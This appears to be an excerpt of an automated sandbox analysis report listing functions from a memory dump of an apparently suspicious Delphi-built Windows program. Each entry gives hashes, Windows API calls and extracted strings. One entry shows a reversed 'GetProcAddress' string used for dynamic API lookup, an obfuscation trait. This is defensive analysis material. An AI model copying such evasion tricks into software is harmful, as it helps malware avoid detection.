                                                                  • Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd
                                                                  Similarity
                                                                  • API ID: InfoLocale
                                                                  • String ID:
                                                                  • API String ID: 2299586839-0
                                                                  • Opcode ID: 509c5edacaf9aea4394e0ed0c27ececf9e7872cb5fcc7e478168e04a53ee32f2
                                                                  • Instruction ID: a41299858d5e63defd3c61a57ba5c1f878ba246361a592d1a6f1766b1e66e62e
                                                                  • Opcode Fuzzy Hash: 509c5edacaf9aea4394e0ed0c27ececf9e7872cb5fcc7e478168e04a53ee32f2
                                                                  • Instruction Fuzzy Hash: ADE0D832B4021417DB12A6689C84DF7725D9F5C310F00D27ABE05C73C5EDB09D404AE4
                                                                  APIs
                                                                  • GetVersionExA.KERNEL32(?,02EDD106,00000000,02EDD11E), ref: 02EBB7AA
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd
                                                                  Similarity
                                                                  • API ID: Version
                                                                  • String ID:
                                                                  • API String ID: 1889659487-0
                                                                  • Opcode ID: 26c94c1a18f849967491dcd529a9c5ae7ac16ff30fcdea560201b6cf5adf0d9a
                                                                  • Instruction ID: 3e00b3c6efb9f1fced8b807d3ff7d8fdb0c02b61510514f06ed1c2123955eff4
                                                                  • Opcode Fuzzy Hash: 26c94c1a18f849967491dcd529a9c5ae7ac16ff30fcdea560201b6cf5adf0d9a
                                                                  • Instruction Fuzzy Hash: C7F017749853018FD380DF2AE44665677E9FF88704F889D2CE998CB380E7359454CF52
                                                                  APIs
                                                                  • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,02EBBE82,00000000,02EBC09B,?,?,00000000,00000000), ref: 02EBA833
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd
                                                                  Similarity
                                                                  • API ID: InfoLocale
                                                                  • String ID:
                                                                  • API String ID: 2299586839-0
                                                                  • Opcode ID: 037d4bc53f8d63c223699879a68f10b0c110be8fc1968dbb48098bc23aaf63a2
                                                                  • Instruction ID: 991fb0b4ae79f549e0efab2275e72d99c3652459ca10318f0a0961389be472f0
                                                                  • Opcode Fuzzy Hash: 037d4bc53f8d63c223699879a68f10b0c110be8fc1968dbb48098bc23aaf63a2
                                                                  • Instruction Fuzzy Hash: E6D05E6234D2602AEA11925A2D88DFB5EECCEC57A1F00913EBA88CA211D6108C0696B5
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd
                                                                  Similarity
                                                                  • API ID: LocalTime
                                                                  • String ID:
                                                                  • API String ID: 481472006-0
                                                                  • Opcode ID: c4b3f0c93823539839d01daad2c09e6f11a765adec9aabbdebd76e5b504f9237
                                                                  • Instruction ID: 027b725e336406cebab2775e0b045aee2db91fc1308823bdd052a6099b5ca1c1
                                                                  • Opcode Fuzzy Hash: c4b3f0c93823539839d01daad2c09e6f11a765adec9aabbdebd76e5b504f9237
                                                                  • Instruction Fuzzy Hash: 09A01280444C2001814033280C025B530445C10A20FC4474078F8402D4F91E01204097
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                  • Instruction ID: d9ca5c35b085eece62e9f9345e2df5b5b2dbbbf6d6fdc43b5a6e4acac797e09a
                                                                  • Opcode Fuzzy Hash: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                  • Instruction Fuzzy Hash: 44317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 97db7c171adaf5f6b17a37d048c6500dd7ac2a3872893b6015d22a75fb85e175
                                                                  • Instruction ID: dda4fdc4a28627ed8baa5e68949c46705323a9e4c1f7061f57993a6d02d36306
                                                                  • Opcode Fuzzy Hash: 97db7c171adaf5f6b17a37d048c6500dd7ac2a3872893b6015d22a75fb85e175
                                                                  • Instruction Fuzzy Hash:
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 02EBD2AD
                                                                    • Part of subcall function 02EBD278: GetProcAddress.KERNEL32(00000000), ref: 02EBD291
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd
                                                                  Similarity
                                                                  • API ID: AddressHandleModuleProc
                                                                  • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                                  • API String ID: 1646373207-1918263038
                                                                  • Opcode ID: 1c2180758eaa02175f0635e5a8d48ccff6e3b8ab4c33bf862aedda759059efca
                                                                  • Instruction ID: 13867706e725be740e56b5b0651f4738d253bcc667decd90620105597f09cefd
                                                                  • Opcode Fuzzy Hash: 1c2180758eaa02175f0635e5a8d48ccff6e3b8ab4c33bf862aedda759059efca
                                                                  • Instruction Fuzzy Hash: DA410CE1AC924C9B561B7B6D7C024B7F7DFEE447603A0F52AB5088B264D920EC51CE29
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(ole32.dll), ref: 02EC6EEE
                                                                  • GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx), ref: 02EC6EFF
                                                                  • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 02EC6F0F
                                                                  • GetProcAddress.KERNEL32(00000000,CoAddRefServerProcess), ref: 02EC6F1F
                                                                  • GetProcAddress.KERNEL32(00000000,CoReleaseServerProcess), ref: 02EC6F2F
                                                                  • GetProcAddress.KERNEL32(00000000,CoResumeClassObjects), ref: 02EC6F3F
                                                                  • GetProcAddress.KERNEL32(00000000,CoSuspendClassObjects), ref: 02EC6F4F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$HandleModule
                                                                  • String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects$ole32.dll
                                                                  • API String ID: 667068680-2233174745
                                                                  • Opcode ID: 31f26636d306554fa591f288ff336f5b633c678e50e36d32a8074ffde08e9ac2
                                                                  • Instruction ID: 3416f6b4ac14894af4a3b60518e3376b32e2005ef046ca1d4828185e2afe50be
                                                                  • Opcode Fuzzy Hash: 31f26636d306554fa591f288ff336f5b633c678e50e36d32a8074ffde08e9ac2
                                                                  • Instruction Fuzzy Hash: 93F08CF0AC93826DFB017FB36E85867375DAE94608324FC1DB802AD586E67298514F11
                                                                  APIs
                                                                  • MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 02EB28CE
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd
                                                                  Similarity
                                                                  • API ID: Message
                                                                  • String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
                                                                  • API String ID: 2030045667-32948583
                                                                  • Opcode ID: f4e2aa42982af0d44c45fa7b8ac2542fccd0da4b4ebe64828b150b8d5ce07153
                                                                  • Instruction ID: be1203d58bd8c94537b95bc8fb321852af6038bd2de860bd99683dbdcd8d99c0
                                                                  • Opcode Fuzzy Hash: f4e2aa42982af0d44c45fa7b8ac2542fccd0da4b4ebe64828b150b8d5ce07153
                                                                  • Instruction Fuzzy Hash: FAA10830A442648BDF23AA2CCC80BDA77E5EF09354F14A1E5EE49AB285CB758985CF51
                                                                  Strings
                                                                  • An unexpected memory leak has occurred. , xrefs: 02EB2690
                                                                  • bytes: , xrefs: 02EB275D
                                                                  • 7, xrefs: 02EB26A1
                                                                  • The unexpected small block leaks are:, xrefs: 02EB2707
                                                                  • Unexpected Memory Leak, xrefs: 02EB28C0
                                                                  • The sizes of unexpected leaked medium and large blocks are: , xrefs: 02EB2849
                                                                  • , xrefs: 02EB2814
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
                                                                  • API String ID: 0-2723507874
                                                                  • Opcode ID: 3fbebc5f391cffb7cb1562a63a9c4da31b1f5473df24ef5de01e08a30b1d3efe
                                                                  • Instruction ID: 140c3c7386a19c82ef70afe4bebba356a7ab6c3f9166d621ebcee37abeaf4608
                                                                  • Opcode Fuzzy Hash: 3fbebc5f391cffb7cb1562a63a9c4da31b1f5473df24ef5de01e08a30b1d3efe
                                                                  • Instruction Fuzzy Hash: B671D730A442688FDF23AA2CCC84BDAB6E5EF09344F10A1E5EA4DDB285DB7549C5CF51
                                                                  APIs
                                                                  • IsBadReadPtr.KERNEL32(?,00000004), ref: 02ECB004
                                                                  • GetModuleHandleW.KERNEL32(KernelBase,LoadLibraryExA,?,00000004,?,00000014), ref: 02ECB01B
                                                                  • LoadLibraryExA.KERNELBASE(?,00000000,00000000), ref: 02ECB033
                                                                  • IsBadReadPtr.KERNEL32(?,00000004), ref: 02ECB0AF
                                                                  • IsBadReadPtr.KERNEL32(?,00000002), ref: 02ECB0BB
                                                                  • IsBadReadPtr.KERNEL32(?,00000014), ref: 02ECB0CF
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd
                                                                  Similarity
                                                                  • API ID: Read$HandleLibraryLoadModule
                                                                  • String ID: KernelBase$LoadLibraryExA
                                                                  • API String ID: 2872661360-113032527
                                                                  • Opcode ID: 54bdd16decc31adcd7517d55dd1e2b4ceb65cc613bcddc25641652828a96dcff
                                                                  • Instruction ID: 3c5cfe467405788c18e3fac8df628a130d80cafa0f8d55be0ab031be3bfaebbb
                                                                  • Opcode Fuzzy Hash: 54bdd16decc31adcd7517d55dd1e2b4ceb65cc613bcddc25641652828a96dcff
                                                                  • Instruction Fuzzy Hash: 2E3154B1680705FBDB21DBE4CE86F9A77A8BF0432CF14D518FA1497285D3709551CBA4
                                                                  APIs
                                                                  • GetThreadLocale.KERNEL32(00000000,02EBC09B,?,?,00000000,00000000), ref: 02EBBE06
                                                                    • Part of subcall function 02EBA7D4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02EBA7F2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd
                                                                  Similarity
                                                                  • API ID: Locale$InfoThread
                                                                  • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                  • API String ID: 4232894706-2493093252
                                                                  • Opcode ID: 58a71c87fcec03d94a0a227e65f0fdc31c30b5f4cbb8cd64a91e8193631150a0
                                                                  • Instruction ID: fd0fe15f508895b1e7e26b3b6c32edfe5119023647b61cfa1500dbbacedff893
                                                                  • Opcode Fuzzy Hash: 58a71c87fcec03d94a0a227e65f0fdc31c30b5f4cbb8cd64a91e8193631150a0
                                                                  • Instruction Fuzzy Hash: CE613474B841485BDF02EBA4D8A0ADF77BB9F88300F60F435B101ABB45DA35D9059FA5
                                                                  APIs
                                                                  • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02EB4423,?,?,02F367C8,?,?,02EDE7A8,02EB65B1,02EDD30D), ref: 02EB4395
                                                                  • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02EB4423,?,?,02F367C8,?,?,02EDE7A8,02EB65B1,02EDD30D), ref: 02EB439B
                                                                  • GetStdHandle.KERNEL32(000000F5,02EB43E4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02EB4423,?,?,02F367C8), ref: 02EB43B0
                                                                  • WriteFile.KERNEL32(00000000,000000F5,02EB43E4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02EB4423,?,?), ref: 02EB43B6
                                                                  • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 02EB43D4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd
                                                                  Similarity
                                                                  • API ID: FileHandleWrite$Message
                                                                  • String ID: Error$Runtime error at 00000000
                                                                  • API String ID: 1570097196-2970929446
                                                                  • Opcode ID: 47c0aff1513c8f656a53134f4a2edd5733ee8ab8c806254a6830d6cb57476535
                                                                  • Instruction ID: 74e69f04daaf6a30f67ca637ede0beb6d37a11e437a9c549a58016da2fcbaf33
                                                                  • Opcode Fuzzy Hash: 47c0aff1513c8f656a53134f4a2edd5733ee8ab8c806254a6830d6cb57476535
                                                                  • Instruction Fuzzy Hash: B4F090A0AC434475F613A2A07C6AFDB775D5F44FA5F58EA05B324AC0C297A480C58B32
                                                                  APIs
                                                                    • Part of subcall function 02EBAD4C: VirtualQuery.KERNEL32(?,?,0000001C), ref: 02EBAD69
                                                                    • Part of subcall function 02EBAD4C: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02EBAD8D
                                                                    • Part of subcall function 02EBAD4C: GetModuleFileNameA.KERNEL32(02EB0000,?,00000105), ref: 02EBADA8
                                                                    • Part of subcall function 02EBAD4C: LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02EBAE3E
                                                                  • CharToOemA.USER32(?,?), ref: 02EBAF0B
                                                                  • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 02EBAF28
                                                                  • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02EBAF2E
                                                                  • GetStdHandle.KERNEL32(000000F4,02EBAF98,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02EBAF43
                                                                  • WriteFile.KERNEL32(00000000,000000F4,02EBAF98,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02EBAF49
                                                                  • LoadStringA.USER32(00000000,0000FFEA,?,00000040), ref: 02EBAF6B
                                                                  • MessageBoxA.USER32(00000000,?,?,00002010), ref: 02EBAF81
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd
                                                                  Similarity
                                                                  • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                                                  • String ID:
                                                                  • API String ID: 185507032-0
                                                                  • Opcode ID: dc664060b5a61251a6e12e48314300e14ed966710d9c57312a2ea7393cb99274
                                                                  • Instruction ID: 0a0044cf4e523658b5251b8a1b37a1d38a2a408e49616934ce2aa3b66ae56d64
                                                                  • Opcode Fuzzy Hash: dc664060b5a61251a6e12e48314300e14ed966710d9c57312a2ea7393cb99274
                                                                  • Instruction Fuzzy Hash: C21170B2584204BFD602FBA4CC88FDBB7EEAF45700F809925B754DA1E0DB75D9408B62
                                                                  APIs
                                                                  • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02EBE635
                                                                  • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02EBE651
                                                                  • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 02EBE68A
                                                                  • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02EBE707
                                                                  • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 02EBE720
                                                                  • VariantCopy.OLEAUT32(?,00000000), ref: 02EBE755
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd
                                                                  Similarity
                                                                  • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                  • String ID:
                                                                  • API String ID: 351091851-0
                                                                  • Opcode ID: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                  • Instruction ID: f8adaed2e9c79708ad981637575ea2a05406bbab9931b4586c09e733d91b43a8
                                                                  • Opcode Fuzzy Hash: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                  • Instruction Fuzzy Hash: B8510C759402299BCB27DB58CD80BDAB3BDAF09304F4895E5FA09E7211D634AF848F61
                                                                  APIs
                                                                  • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02EB35BA
                                                                  • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,02EB3609,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02EB35ED
                                                                  • RegCloseKey.ADVAPI32(?,02EB3610,00000000,?,00000004,00000000,02EB3609,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02EB3603
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd
                                                                  Similarity
                                                                  • API ID: CloseOpenQueryValue
                                                                  • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                  • API String ID: 3677997916-4173385793
                                                                  • Opcode ID: 3afb02dae72bfedf7dc3b40cd0b43da97decf61b32e2c3b480784c916e65cf00
                                                                  • Instruction ID: 19cb137264a73e4d0b9ee91ba4e7a30084be3054a73518e5c80e6dc182819c7e
                                                                  • Opcode Fuzzy Hash: 3afb02dae72bfedf7dc3b40cd0b43da97decf61b32e2c3b480784c916e65cf00
                                                                  • Instruction Fuzzy Hash: E801F575DC0208BAEB12DBA09E03BFA73ECDF08B10F5044A1BA04DA680E274A910DA59
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02EC830C,?,?,00000000,00000000,?,02EC8225,00000000,KernelBASE,00000000,00000000,02EC824C), ref: 02EC82D1
                                                                  • GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02EC82D7
                                                                  • GetProcAddress.KERNEL32(?,?), ref: 02EC82E9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$HandleModule
                                                                  • String ID: Kernel32$sserddAcorPteG
                                                                  • API String ID: 667068680-1372893251
                                                                  • Opcode ID: e7e295b44a7faf405a55ef2b4411fbe4bb28dde949a41f3899b23ce49b99c72a
                                                                  • Instruction ID: 54ed5bbf507c0736e300c396119a85a8e694e0264ec6ed91605788d8a7d74b13
                                                                  • Opcode Fuzzy Hash: e7e295b44a7faf405a55ef2b4411fbe4bb28dde949a41f3899b23ce49b99c72a
                                                                  • Instruction Fuzzy Hash: 740162746C0308AFE706EBA8DD51E9FB7EEEF4DB00F61E464B800D7641D674A901CA24
                                                                  APIs
